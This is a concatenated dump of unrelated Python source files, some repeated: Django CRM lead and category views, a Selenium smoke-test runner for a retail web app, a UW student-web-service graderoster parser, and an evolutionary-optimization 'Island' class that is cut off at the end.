queryset.filter(category__isnull=True).count() }) return context def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) class CategoryDetailView(LoginRequiredMixin, generic.DetailView): template_name = 'leads/category_detail.html' def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) class LeadCategoryUpdateView(LoginRequiredMixin, generic.UpdateView): template_name = 'leads/lead_category_update.html' form_class = LeadCategoryUpdateForm def get_form(self, form_class=None): form = super(LeadCategoryUpdateView, self).get_form(form_class) user = self.request.user if self.request.user.is_organiser: queryset = Category.objects.filter(organisation=user.userprofile) else: queryset = Category.objects.filter(organisation=user.agent.organisation) form.fields['category'].queryset = queryset return form def get_queryset(self): user = self.request.user if self.request.user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile, agent__isnull=False) else: queryset = Lead.objects.filter(organisation=user.agent.organisation, agent__isnull=False) queryset = queryset.filter(agent__user=user) return queryset def get_success_url(self): return reverse('leads:lead-detail', kwargs={'pk': self.get_object().pk}) class CategoryCreateView(OrganiserAndLoginRequiredMixin, generic.CreateView): template_name = 'leads/category_create.html' form_class = CategoryModelForm def form_valid(self, form): category = form.save(commit=False) category.organisation = self.request.user.userprofile category.save() return super(CategoryCreateView, self).form_valid(form) def get_success_url(self): return reverse('leads:category-list') class CategoryUpdateView(OrganiserAndLoginRequiredMixin, 
generic.UpdateView): template_name = 'leads/category_update.html' form_class = CategoryModelForm def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) def get_success_url(self): return reverse('leads:category-list') class CategoryDeleteView(OrganiserAndLoginRequiredMixin, generic.DeleteView): template_name = 'leads/lead_delete.html' def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) def get_success_url(self): return reverse('leads:category-list')
leads/views.py
from django.shortcuts import reverse from django.views import generic from django.contrib.auth.mixins import LoginRequiredMixin from agents.mixins import OrganiserAndLoginRequiredMixin from .models import Lead, Category, Agent from .forms import ( LeadModelForm, CustomUserCreationForm, AssignAgentForm, LeadCategoryUpdateForm, CategoryModelForm ) class SignupView(generic.CreateView): template_name = 'registration/signup.html' form_class = CustomUserCreationForm def get_success_url(self): return reverse('login') class LandingPageView(generic.TemplateView): template_name = 'landing.html' class LeadListView(LoginRequiredMixin, generic.ListView): template_name = 'leads/lead_list.html' context_object_name = 'leads' def get_queryset(self): user = self.request.user if self.request.user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile, agent__isnull=False) else: queryset = Lead.objects.filter(organisation=user.agent.organisation, agent__isnull=False) queryset = queryset.filter(agent__user=user) return queryset def get_context_data(self, **kwargs): context = super(LeadListView, self).get_context_data(**kwargs) user = self.request.user if user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile, agent__isnull=True) context.update({ 'unassigned_leads': queryset }) return context class LeadDetailView(OrganiserAndLoginRequiredMixin, generic.DetailView): template_name = 'leads/lead_detail.html' def get_queryset(self): return Lead.objects.filter(organisation=self.request.user.userprofile) class LeadCreateView(OrganiserAndLoginRequiredMixin, generic.CreateView): template_name = 'leads/lead_create.html' form_class = LeadModelForm def form_valid(self, form): lead = form.save(commit=False) user = self.request.user if user.is_organiser: lead.organisation = user.userprofile else: lead.organisation = user.agent.organisation lead.save() return super(LeadCreateView, self).form_valid(form) def get_success_url(self): return 
reverse('leads:lead-list') class LeadUpdateView(OrganiserAndLoginRequiredMixin, generic.UpdateView): template_name = 'leads/lead_update.html' form_class = LeadModelForm def get_form(self, form_class=None): form = super(LeadUpdateView, self).get_form(form_class) user = self.request.user if self.request.user.is_organiser: queryset = Agent.objects.filter(organisation=user.userprofile) else: queryset = Agent.objects.filter(organisation=user.agent.organisation) form.fields['agent'].queryset = queryset return form def get_queryset(self): return Lead.objects.filter(organisation=self.request.user.userprofile) def get_success_url(self): return reverse('leads:lead-detail', kwargs={'pk': self.get_object().pk}) class LeadDeleteView(OrganiserAndLoginRequiredMixin, generic.DeleteView): template_name = 'leads/lead_delete.html' def get_queryset(self): return Lead.objects.filter(organisation=self.request.user.userprofile) def get_success_url(self): return reverse('leads:lead-list') class AssignAgentView(OrganiserAndLoginRequiredMixin, generic.FormView): template_name = 'leads/assign_agent.html' form_class = AssignAgentForm def get_form_kwargs(self): kwargs = super(AssignAgentView, self).get_form_kwargs() kwargs.update({'request': self.request}) return kwargs def form_valid(self, form): lead = Lead.objects.get(id=self.kwargs.get('pk')) lead.agent = form.cleaned_data.get('agent') lead.save() return super(AssignAgentView, self).form_valid(form) def get_success_url(self): return reverse('leads:lead-list') class CategoryListView(LoginRequiredMixin, generic.ListView): template_name = 'leads/category_list.html' context_object_name = 'categories' def get_context_data(self, **kwargs): context = super(CategoryListView, self).get_context_data(**kwargs) user = self.request.user if user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile) else: queryset = Lead.objects.filter(organisation=user.agent.organisation) context.update({ 'unassigned_lead_count': 
queryset.filter(category__isnull=True).count() }) return context def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) class CategoryDetailView(LoginRequiredMixin, generic.DetailView): template_name = 'leads/category_detail.html' def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) class LeadCategoryUpdateView(LoginRequiredMixin, generic.UpdateView): template_name = 'leads/lead_category_update.html' form_class = LeadCategoryUpdateForm def get_form(self, form_class=None): form = super(LeadCategoryUpdateView, self).get_form(form_class) user = self.request.user if self.request.user.is_organiser: queryset = Category.objects.filter(organisation=user.userprofile) else: queryset = Category.objects.filter(organisation=user.agent.organisation) form.fields['category'].queryset = queryset return form def get_queryset(self): user = self.request.user if self.request.user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile, agent__isnull=False) else: queryset = Lead.objects.filter(organisation=user.agent.organisation, agent__isnull=False) queryset = queryset.filter(agent__user=user) return queryset def get_success_url(self): return reverse('leads:lead-detail', kwargs={'pk': self.get_object().pk}) class CategoryCreateView(OrganiserAndLoginRequiredMixin, generic.CreateView): template_name = 'leads/category_create.html' form_class = CategoryModelForm def form_valid(self, form): category = form.save(commit=False) category.organisation = self.request.user.userprofile category.save() return super(CategoryCreateView, self).form_valid(form) def get_success_url(self): return reverse('leads:category-list') class CategoryUpdateView(OrganiserAndLoginRequiredMixin, 
generic.UpdateView): template_name = 'leads/category_update.html' form_class = CategoryModelForm def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) def get_success_url(self): return reverse('leads:category-list') class CategoryDeleteView(OrganiserAndLoginRequiredMixin, generic.DeleteView): template_name = 'leads/lead_delete.html' def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) def get_success_url(self): return reverse('leads:category-list')
0.532425
0.102844
import logging from init_program import ( init_prog, start_browser, login_base ) from full_cycle import menu_full_cycle_go, page_full_cycle_go from serializer import write_serialize_data, read_serialize_data, delete_screens_and_log from toolbox import log_record, exit_prog from scenario_mod import start_scenario from cursor_pos import cursor_pos from partial_cycle import start_partial_cycle from go_open_form import open_forms from webdriver import get_webdriver_quit ''' главный модуль программы запуск программы происходит из этого модуля ''' def check_table_elements(main_data:object): table_elements = main_data.table_elements() if table_elements == None or len(table_elements['table']) == 0: get_webdriver_quit(main_data.driver()) log_record('программа прекратила работу, нет сохраненной таблицы меню, воспользуйтесь созданием данной таблицы через запуск программы в режиме savemenu') exit_prog() def check_end(main_data, last_mode:str, curr_mode:str, str_log:str): if last_mode == curr_mode: get_webdriver_quit(main_data.driver()) log_record(str_log) logging.shutdown() def main_func(): main_data = login_base( start_browser( init_prog(tuple()) ) ) mode = main_data.mode() last_mode = mode[-1] if main_data.del_screen_and_log() == 'Yes': delete_screens_and_log() log_record('НАЧАЛО РАБОТЫ ПРОГРАММЫ') for m in mode: if m == 'savemenu': log_record('началось чтение разделов меню программы') old_table = read_serialize_data('dict_main_elements') del old_table main_data = menu_full_cycle_go(main_data) write_serialize_data('dict_main_elements', main_data.table_elements()) check_end(main_data, last_mode, 'savemenu', 'разделы сохранены в файл dict_main_elements.pickle') elif m == 'go': log_record('начался обход') main_data.set_table_elements( read_serialize_data(text='dict_main_elements', remove_arg=False) ) check_table_elements(main_data) page_full_cycle_go(main_data) check_end(main_data, last_mode, 'go', 'обход завершен') elif m == 'scenario': start_scenario(main_data) 
check_end(main_data, last_mode, 'scenario', 'закончено выполнение сценария') elif m == 'cursor': cursor_pos(main_data) elif m == 'go_partial': log_record('начался частичный обход') main_data.set_table_elements( read_serialize_data(text='dict_main_elements', remove_arg=False) ) check_table_elements(main_data) start_partial_cycle(main_data) check_end(main_data, last_mode, 'go_partial', 'частичный обход завершен') elif m == 'open_forms': log_record('начался обход открытия форм') main_data.set_table_elements( read_serialize_data(text='dict_main_elements', remove_arg=False) ) check_table_elements(main_data) open_forms(main_data) check_end(main_data, last_mode, 'open_forms', 'закончился обход открытия форм') if __name__ == "__main__": main_func()
retail-smoke/main.py
import logging from init_program import ( init_prog, start_browser, login_base ) from full_cycle import menu_full_cycle_go, page_full_cycle_go from serializer import write_serialize_data, read_serialize_data, delete_screens_and_log from toolbox import log_record, exit_prog from scenario_mod import start_scenario from cursor_pos import cursor_pos from partial_cycle import start_partial_cycle from go_open_form import open_forms from webdriver import get_webdriver_quit ''' главный модуль программы запуск программы происходит из этого модуля ''' def check_table_elements(main_data:object): table_elements = main_data.table_elements() if table_elements == None or len(table_elements['table']) == 0: get_webdriver_quit(main_data.driver()) log_record('программа прекратила работу, нет сохраненной таблицы меню, воспользуйтесь созданием данной таблицы через запуск программы в режиме savemenu') exit_prog() def check_end(main_data, last_mode:str, curr_mode:str, str_log:str): if last_mode == curr_mode: get_webdriver_quit(main_data.driver()) log_record(str_log) logging.shutdown() def main_func(): main_data = login_base( start_browser( init_prog(tuple()) ) ) mode = main_data.mode() last_mode = mode[-1] if main_data.del_screen_and_log() == 'Yes': delete_screens_and_log() log_record('НАЧАЛО РАБОТЫ ПРОГРАММЫ') for m in mode: if m == 'savemenu': log_record('началось чтение разделов меню программы') old_table = read_serialize_data('dict_main_elements') del old_table main_data = menu_full_cycle_go(main_data) write_serialize_data('dict_main_elements', main_data.table_elements()) check_end(main_data, last_mode, 'savemenu', 'разделы сохранены в файл dict_main_elements.pickle') elif m == 'go': log_record('начался обход') main_data.set_table_elements( read_serialize_data(text='dict_main_elements', remove_arg=False) ) check_table_elements(main_data) page_full_cycle_go(main_data) check_end(main_data, last_mode, 'go', 'обход завершен') elif m == 'scenario': start_scenario(main_data) 
check_end(main_data, last_mode, 'scenario', 'закончено выполнение сценария') elif m == 'cursor': cursor_pos(main_data) elif m == 'go_partial': log_record('начался частичный обход') main_data.set_table_elements( read_serialize_data(text='dict_main_elements', remove_arg=False) ) check_table_elements(main_data) start_partial_cycle(main_data) check_end(main_data, last_mode, 'go_partial', 'частичный обход завершен') elif m == 'open_forms': log_record('начался обход открытия форм') main_data.set_table_elements( read_serialize_data(text='dict_main_elements', remove_arg=False) ) check_table_elements(main_data) open_forms(main_data) check_end(main_data, last_mode, 'open_forms', 'закончился обход открытия форм') if __name__ == "__main__": main_func()
0.110916
0.120051
from restclients.pws import PWS from restclients.sws import encode_section_label from restclients.dao import SWS_DAO from restclients.exceptions import DataFailureException from restclients.models.sws import GradeRoster, GradeRosterItem from restclients.models.sws import GradeSubmissionDelegate from lxml import etree import re graderoster_url = "/student/v5/graderoster" def get_graderoster(section, instructor, requestor): """ Returns a restclients.GradeRoster for the passed Section model and instructor Person. """ label = GradeRoster(section=section, instructor=instructor).graderoster_label() url = "%s/%s" % (graderoster_url, encode_section_label(label)) headers = {"Accept": "text/xhtml", "Connection": "keep-alive", "X-UW-Act-as": requestor.uwnetid} response = SWS_DAO().getURL(url, headers) if response.status != 200: root = etree.fromstring(response.data) msg = root.find(".//*[@class='status_description']").text.strip() raise DataFailureException(url, response.status, msg) return graderoster_from_xhtml(response.data, section, instructor) def update_graderoster(graderoster, requestor): """ Updates the graderoster resource for the passed restclients.GradeRoster model. A new restclients.GradeRoster is returned, representing the document returned from the update request. 
""" label = graderoster.graderoster_label() url = "%s/%s" % (graderoster_url, encode_section_label(label)) headers = {"Content-Type": "application/xhtml+xml", "Connection": "keep-alive", "X-UW-Act-as": requestor.uwnetid} body = graderoster.xhtml() response = SWS_DAO().putURL(url, headers, body) if response.status != 200: root = etree.fromstring(response.data) msg = root.find(".//*[@class='status_description']").text.strip() raise DataFailureException(url, response.status, msg) return graderoster_from_xhtml(response.data, graderoster.section, graderoster.instructor) def graderoster_from_xhtml(data, section, instructor): pws = PWS() people = {instructor.uwregid: instructor} graderoster = GradeRoster() graderoster.section = section graderoster.instructor = instructor graderoster.authorized_grade_submitters = [] graderoster.grade_submission_delegates = [] graderoster.items = [] tree = etree.fromstring(data.strip()) nsmap = {"xhtml": "http://www.w3.org/1999/xhtml"} root = tree.xpath(".//xhtml:div[@class='graderoster']", namespaces=nsmap)[0] default_section_id = None el = root.xpath("./xhtml:div/xhtml:a[@rel='section']/*[@class='section_id']", namespaces=nsmap)[0] default_section_id = el.text.upper() el = root.xpath("./xhtml:div/*[@class='section_credits']", namespaces=nsmap)[0] if el.text is not None: graderoster.section_credits = el.text.strip() el = root.xpath("./xhtml:div/*[@class='writing_credit_display']", namespaces=nsmap)[0] if el.get("checked", "") == "checked": graderoster.allows_writing_credit = True for el in root.xpath("./xhtml:div//*[@rel='authorized_grade_submitter']", namespaces=nsmap): reg_id = el.xpath(".//*[@class='reg_id']")[0].text.strip() if reg_id not in people: people[reg_id] = pws.get_person_by_regid(reg_id) graderoster.authorized_grade_submitters.append(people[reg_id]) for el in root.xpath("./xhtml:div//*[@class='grade_submission_delegate']", namespaces=nsmap): reg_id = el.xpath(".//*[@class='reg_id']")[0].text.strip() delegate_level = 
el.xpath(".//*[@class='delegate_level']")[0].text.strip() if reg_id not in people: people[reg_id] = pws.get_person_by_regid(reg_id) delegate = GradeSubmissionDelegate(person=people[reg_id], delegate_level=delegate_level) graderoster.grade_submission_delegates.append(delegate) for item in root.xpath("./*[@class='graderoster_items']/*[@class='graderoster_item']"): gr_item = GradeRosterItem(section_id=default_section_id) gr_item.grade_choices = [] for el in item.xpath(".//xhtml:a[@rel='student']/*[@class='reg_id']", namespaces=nsmap): gr_item.student_uwregid = el.text.strip() for el in item.xpath(".//xhtml:a[@rel='student']/*[@class='name']", namespaces=nsmap): full_name = el.text.strip() try: (surname, first_name) = full_name.split(",", 1) gr_item.student_first_name = first_name gr_item.student_surname = surname except ValueError: pass for el in item.xpath(".//*[@class]"): classname = el.get("class") if classname == "duplicate_code" and el.text is not None: duplicate_code = el.text.strip() if len(duplicate_code): gr_item.duplicate_code = duplicate_code elif classname == "section_id" and el.text is not None: gr_item.section_id = el.text.strip() elif classname == "student_former_name" and el.text is not None: student_former_name = el.text.strip() if len(student_former_name): gr_item.student_former_name = student_former_name elif classname == "student_number": gr_item.student_number = el.text.strip() elif classname == "student_credits" and el.text is not None: gr_item.student_credits = el.text.strip() elif "date_withdrawn" in classname and el.text is not None: gr_item.date_withdrawn = el.text.strip() elif classname == "incomplete": if el.get("checked", "") == "checked": gr_item.has_incomplete = True if el.get("disabled", "") != "disabled": gr_item.allows_incomplete = True elif classname == "writing_course": if el.get("checked", "") == "checked": gr_item.has_writing_credit = True elif classname == "auditor": if el.get("checked", "") == "checked": gr_item.is_auditor = 
True elif classname == "no_grade_now": if el.get("checked", "") == "checked": gr_item.no_grade_now = True elif classname == "grades": if el.get("disabled", "") != "disabled": gr_item.allows_grade_change = True elif classname == "grade": grade = el.text.strip() if el.text is not None else "" gr_item.grade_choices.append(grade) if el.get("selected", "") == "selected": gr_item.grade = grade elif classname == "grade_document_id" and el.text is not None: gr_item.grade_document_id = el.text.strip() elif "date_graded" in classname and el.text is not None: gr_item.date_graded = el.text.strip() elif classname == "grade_submitter_source" and el.text is not None: gr_item.grade_submitter_source = el.text.strip() elif classname == "code" and el.text is not None: gr_item.status_code = el.text.strip() elif classname == "message" and el.text is not None: gr_item.status_message = el.text.strip() for el in item.xpath(".//xhtml:a[@rel='grade_submitter_person']/*[@class='reg_id']", namespaces=nsmap): reg_id = el.text.strip() if reg_id not in people: people[reg_id] = pws.get_person_by_regid(reg_id) gr_item.grade_submitter_person = people[reg_id] graderoster.items.append(gr_item) return graderoster
restclients/sws/v5/graderoster.py
from restclients.pws import PWS
from restclients.sws import encode_section_label
from restclients.dao import SWS_DAO
from restclients.exceptions import DataFailureException
from restclients.models.sws import GradeRoster, GradeRosterItem
from restclients.models.sws import GradeSubmissionDelegate
from lxml import etree
import re  # NOTE(review): appears unused in this module - confirm before removing

# Base path of the SWS v5 graderoster resource.
graderoster_url = "/student/v5/graderoster"


def get_graderoster(section, instructor, requestor):
    """
    Returns a restclients.GradeRoster for the passed Section model and
    instructor Person.

    The request is issued on behalf of ``requestor`` via the
    X-UW-Act-as header.  Raises DataFailureException on a non-200
    response, using the error document's 'status_description' text as
    the message.
    """
    label = GradeRoster(section=section,
                        instructor=instructor).graderoster_label()
    url = "%s/%s" % (graderoster_url, encode_section_label(label))
    headers = {"Accept": "text/xhtml",
               "Connection": "keep-alive",
               "X-UW-Act-as": requestor.uwnetid}
    response = SWS_DAO().getURL(url, headers)
    if response.status != 200:
        # Error responses carry a human-readable description in the body.
        root = etree.fromstring(response.data)
        msg = root.find(".//*[@class='status_description']").text.strip()
        raise DataFailureException(url, response.status, msg)
    return graderoster_from_xhtml(response.data, section, instructor)


def update_graderoster(graderoster, requestor):
    """
    Updates the graderoster resource for the passed
    restclients.GradeRoster model. A new restclients.GradeRoster is
    returned, representing the document returned from the update
    request.

    Raises DataFailureException on a non-200 response, using the error
    document's 'status_description' text as the message.
    """
    label = graderoster.graderoster_label()
    url = "%s/%s" % (graderoster_url, encode_section_label(label))
    headers = {"Content-Type": "application/xhtml+xml",
               "Connection": "keep-alive",
               "X-UW-Act-as": requestor.uwnetid}
    body = graderoster.xhtml()
    response = SWS_DAO().putURL(url, headers, body)
    if response.status != 200:
        root = etree.fromstring(response.data)
        msg = root.find(".//*[@class='status_description']").text.strip()
        raise DataFailureException(url, response.status, msg)
    return graderoster_from_xhtml(response.data, graderoster.section,
                                  graderoster.instructor)


def graderoster_from_xhtml(data, section, instructor):
    """
    Parses a graderoster XHTML document into a restclients.GradeRoster.

    ``people`` caches PWS person lookups by regid so each person is
    fetched at most once per document; the instructor is pre-seeded.
    """
    pws = PWS()
    people = {instructor.uwregid: instructor}
    graderoster = GradeRoster()
    graderoster.section = section
    graderoster.instructor = instructor
    graderoster.authorized_grade_submitters = []
    graderoster.grade_submission_delegates = []
    graderoster.items = []
    tree = etree.fromstring(data.strip())
    nsmap = {"xhtml": "http://www.w3.org/1999/xhtml"}
    root = tree.xpath(".//xhtml:div[@class='graderoster']",
                      namespaces=nsmap)[0]

    # Section-level fields: default section id (upper-cased), credits,
    # and whether writing credit is offered.
    default_section_id = None
    el = root.xpath("./xhtml:div/xhtml:a[@rel='section']/*[@class='section_id']",
                    namespaces=nsmap)[0]
    default_section_id = el.text.upper()

    el = root.xpath("./xhtml:div/*[@class='section_credits']",
                    namespaces=nsmap)[0]
    if el.text is not None:
        graderoster.section_credits = el.text.strip()

    el = root.xpath("./xhtml:div/*[@class='writing_credit_display']",
                    namespaces=nsmap)[0]
    if el.get("checked", "") == "checked":
        graderoster.allows_writing_credit = True

    # People authorized to submit grades for this roster.
    for el in root.xpath("./xhtml:div//*[@rel='authorized_grade_submitter']",
                         namespaces=nsmap):
        reg_id = el.xpath(".//*[@class='reg_id']")[0].text.strip()
        if reg_id not in people:
            people[reg_id] = pws.get_person_by_regid(reg_id)
        graderoster.authorized_grade_submitters.append(people[reg_id])

    # Delegates, each with an associated delegate level.
    for el in root.xpath("./xhtml:div//*[@class='grade_submission_delegate']",
                         namespaces=nsmap):
        reg_id = el.xpath(".//*[@class='reg_id']")[0].text.strip()
        delegate_level = el.xpath(".//*[@class='delegate_level']")[0].text.strip()
        if reg_id not in people:
            people[reg_id] = pws.get_person_by_regid(reg_id)
        delegate = GradeSubmissionDelegate(person=people[reg_id],
                                           delegate_level=delegate_level)
        graderoster.grade_submission_delegates.append(delegate)

    # One GradeRosterItem per student row.
    # NOTE(review): this query passes no namespaces=, unlike the queries
    # above - presumably these elements are non-namespaced; confirm
    # against an actual SWS response document.
    for item in root.xpath("./*[@class='graderoster_items']/*[@class='graderoster_item']"):
        gr_item = GradeRosterItem(section_id=default_section_id)
        gr_item.grade_choices = []
        for el in item.xpath(".//xhtml:a[@rel='student']/*[@class='reg_id']",
                             namespaces=nsmap):
            gr_item.student_uwregid = el.text.strip()
        for el in item.xpath(".//xhtml:a[@rel='student']/*[@class='name']",
                             namespaces=nsmap):
            full_name = el.text.strip()
            try:
                # Name is "Surname, First"; ValueError (no comma) leaves
                # both name fields unset.
                # NOTE(review): first_name keeps the leading space after
                # the comma - confirm whether downstream strips it.
                (surname, first_name) = full_name.split(",", 1)
                gr_item.student_first_name = first_name
                gr_item.student_surname = surname
            except ValueError:
                pass
        # Per-item fields are dispatched by each element's class
        # attribute; most are ignored when el.text is None.
        for el in item.xpath(".//*[@class]"):
            classname = el.get("class")
            if classname == "duplicate_code" and el.text is not None:
                duplicate_code = el.text.strip()
                if len(duplicate_code):
                    gr_item.duplicate_code = duplicate_code
            elif classname == "section_id" and el.text is not None:
                gr_item.section_id = el.text.strip()
            elif classname == "student_former_name" and el.text is not None:
                student_former_name = el.text.strip()
                if len(student_former_name):
                    gr_item.student_former_name = student_former_name
            elif classname == "student_number":
                gr_item.student_number = el.text.strip()
            elif classname == "student_credits" and el.text is not None:
                gr_item.student_credits = el.text.strip()
            # Substring match: the class attribute may carry extra tokens.
            elif "date_withdrawn" in classname and el.text is not None:
                gr_item.date_withdrawn = el.text.strip()
            elif classname == "incomplete":
                # Checkbox semantics: "checked" = has incomplete,
                # not "disabled" = user may set incomplete.
                if el.get("checked", "") == "checked":
                    gr_item.has_incomplete = True
                if el.get("disabled", "") != "disabled":
                    gr_item.allows_incomplete = True
            elif classname == "writing_course":
                if el.get("checked", "") == "checked":
                    gr_item.has_writing_credit = True
            elif classname == "auditor":
                if el.get("checked", "") == "checked":
                    gr_item.is_auditor = True
            elif classname == "no_grade_now":
                if el.get("checked", "") == "checked":
                    gr_item.no_grade_now = True
            elif classname == "grades":
                if el.get("disabled", "") != "disabled":
                    gr_item.allows_grade_change = True
            elif classname == "grade":
                # Each grade option is collected; the "selected" one is
                # also recorded as the current grade.
                grade = el.text.strip() if el.text is not None else ""
                gr_item.grade_choices.append(grade)
                if el.get("selected", "") == "selected":
                    gr_item.grade = grade
            elif classname == "grade_document_id" and el.text is not None:
                gr_item.grade_document_id = el.text.strip()
            elif "date_graded" in classname and el.text is not None:
                gr_item.date_graded = el.text.strip()
            elif classname == "grade_submitter_source" and el.text is not None:
                gr_item.grade_submitter_source = el.text.strip()
            elif classname == "code" and el.text is not None:
                gr_item.status_code = el.text.strip()
            elif classname == "message" and el.text is not None:
                gr_item.status_message = el.text.strip()
        for el in item.xpath(".//xhtml:a[@rel='grade_submitter_person']/*[@class='reg_id']",
                             namespaces=nsmap):
            reg_id = el.text.strip()
            if reg_id not in people:
                people[reg_id] = pws.get_person_by_regid(reg_id)
            gr_item.grade_submitter_person = people[reg_id]
        graderoster.items.append(gr_item)
    return graderoster
0.449151
0.158012
import logging

import numpy as np

from .evolutionary_optimizer import EvolutionaryOptimizer
from ..util.argument_validation import argument_validation

LOGGER = logging.getLogger(__name__)


class Island(EvolutionaryOptimizer):
    """A single-population unit of evolutionary optimization.

    An Island owns one population, created by ``generator`` and advanced
    one generation at a time by ``evolution_algorithm``.

    Parameters
    ----------
    evolution_algorithm : `EvolutionaryAlgorithm`
        Algorithm used to evolve and assess the population.
    generator : `Generator`
        Callable returning a new chromosome instance.
    population_size : int
        Number of individuals to create initially.
    hall_of_fame : `HallOfFame`, optional
        Storage for the best individuals seen during optimization.
    test_function : `FitnessFunction`, optional
        Independent fitness judge, separate from the one used in
        evolution.

    Attributes
    ----------
    generational_age : int
        Number of generational steps executed so far.
    population : list of chromosomes
        The evolving population.
    """

    @argument_validation(population_size={">=": 0})
    def __init__(self, evolution_algorithm, generator, population_size,
                 hall_of_fame=None, test_function=None):
        super().__init__(hall_of_fame, test_function)
        self._generator = generator
        self.population = [generator() for _ in range(population_size)]
        self._ea = evolution_algorithm
        self._population_size = population_size
        self.idx = 0

    def _do_evolution(self, num_generations):
        # Advance the island the requested number of generations.
        for _gen in range(num_generations):
            self._execute_generational_step()

    def _execute_generational_step(self):
        # One step: delegate evolution to the EA, then age every member.
        self.generational_age += 1
        self.population = self._ea.generational_step(self.population,
                                                     self.idx)
        for member in self.population:
            member.genetic_age += 1

    def evaluate_population(self):
        """Manually trigger fitness evaluation of the population."""
        self._ea.evaluation(self.population)

    def get_best_individual(self):
        """Find the individual with the lowest fitness in the population.

        Returns
        -------
        chromosomes
            The population member with the lowest fitness value.
        """
        self.evaluate_population()
        best = self.population[0]
        for candidate in self.population:
            # A NaN current best is always displaced by the candidate.
            if candidate.fitness < best.fitness \
                    or np.isnan(best.fitness).any():
                best = candidate
        return best

    def get_best_fitness(self):
        """Return the fitness value of the most fit individual."""
        return self.get_best_individual().fitness

    def get_fitness_evaluation_count(self):
        """Return the number of fitness evaluations performed.

        Returns
        -------
        int
            Number of fitness evaluations.
        """
        return self._ea.evaluation.eval_count

    def get_ea_diagnostic_info(self):
        """Return diagnostic info from the evolutionary algorithm(s).

        Returns
        -------
        EaDiagnosticsSummary
            Summary of evolutionary algorithm diagnostics.
        """
        return self._ea.diagnostics

    def _get_potential_hof_members(self):
        # Every current member is a hall-of-fame candidate.
        return self.population

    def dump_fraction_of_population(self, fraction):
        """Remove and return a random portion of the population.

        Parameters
        ----------
        fraction : float [0.0 - 1.0]
            The fraction of the population to dump.

        Returns
        -------
        list of chromosomes
            The removed individuals.
        """
        np.random.shuffle(self.population)
        cut = int(round(fraction * len(self.population)))
        dumped, kept = self.population[:cut], self.population[cut:]
        self.population = kept
        return dumped

    def regenerate_population(self):
        """Replace the population with freshly generated individuals."""
        size = len(self.population)
        self.population = [self._generator() for _ in range(size)]

    def reset_fitness(self, population=None):
        """Mark individuals as needing fitness re-evaluation.

        Parameters
        ----------
        population : list of `Chromosome`, optional
            Individuals to reset. Default: the island's current
            population.
        """
        targets = self.population if population is None else population
        for member in targets:
            member.fit_set = False
bingo/evolutionary_optimizers/island.py
import logging

import numpy as np

from .evolutionary_optimizer import EvolutionaryOptimizer
from ..util.argument_validation import argument_validation

LOGGER = logging.getLogger(__name__)


class Island(EvolutionaryOptimizer):
    """A single-population unit of evolutionary optimization.

    An Island owns one population, created by ``generator`` and advanced
    one generation at a time by ``evolution_algorithm``.

    Parameters
    ----------
    evolution_algorithm : `EvolutionaryAlgorithm`
        Algorithm used to evolve and assess the population.
    generator : `Generator`
        Callable returning a new chromosome instance.
    population_size : int
        Number of individuals to create initially.
    hall_of_fame : `HallOfFame`, optional
        Storage for the best individuals seen during optimization.
    test_function : `FitnessFunction`, optional
        Independent fitness judge, separate from the one used in
        evolution.

    Attributes
    ----------
    generational_age : int
        Number of generational steps executed so far.
    population : list of chromosomes
        The evolving population.
    """

    @argument_validation(population_size={">=": 0})
    def __init__(self, evolution_algorithm, generator, population_size,
                 hall_of_fame=None, test_function=None):
        super().__init__(hall_of_fame, test_function)
        self._generator = generator
        self.population = [generator() for _ in range(population_size)]
        self._ea = evolution_algorithm
        self._population_size = population_size
        self.idx = 0

    def _do_evolution(self, num_generations):
        # Advance the island the requested number of generations.
        for _gen in range(num_generations):
            self._execute_generational_step()

    def _execute_generational_step(self):
        # One step: delegate evolution to the EA, then age every member.
        self.generational_age += 1
        self.population = self._ea.generational_step(self.population,
                                                     self.idx)
        for member in self.population:
            member.genetic_age += 1

    def evaluate_population(self):
        """Manually trigger fitness evaluation of the population."""
        self._ea.evaluation(self.population)

    def get_best_individual(self):
        """Find the individual with the lowest fitness in the population.

        Returns
        -------
        chromosomes
            The population member with the lowest fitness value.
        """
        self.evaluate_population()
        best = self.population[0]
        for candidate in self.population:
            # A NaN current best is always displaced by the candidate.
            if candidate.fitness < best.fitness \
                    or np.isnan(best.fitness).any():
                best = candidate
        return best

    def get_best_fitness(self):
        """Return the fitness value of the most fit individual."""
        return self.get_best_individual().fitness

    def get_fitness_evaluation_count(self):
        """Return the number of fitness evaluations performed.

        Returns
        -------
        int
            Number of fitness evaluations.
        """
        return self._ea.evaluation.eval_count

    def get_ea_diagnostic_info(self):
        """Return diagnostic info from the evolutionary algorithm(s).

        Returns
        -------
        EaDiagnosticsSummary
            Summary of evolutionary algorithm diagnostics.
        """
        return self._ea.diagnostics

    def _get_potential_hof_members(self):
        # Every current member is a hall-of-fame candidate.
        return self.population

    def dump_fraction_of_population(self, fraction):
        """Remove and return a random portion of the population.

        Parameters
        ----------
        fraction : float [0.0 - 1.0]
            The fraction of the population to dump.

        Returns
        -------
        list of chromosomes
            The removed individuals.
        """
        np.random.shuffle(self.population)
        cut = int(round(fraction * len(self.population)))
        dumped, kept = self.population[:cut], self.population[cut:]
        self.population = kept
        return dumped

    def regenerate_population(self):
        """Replace the population with freshly generated individuals."""
        size = len(self.population)
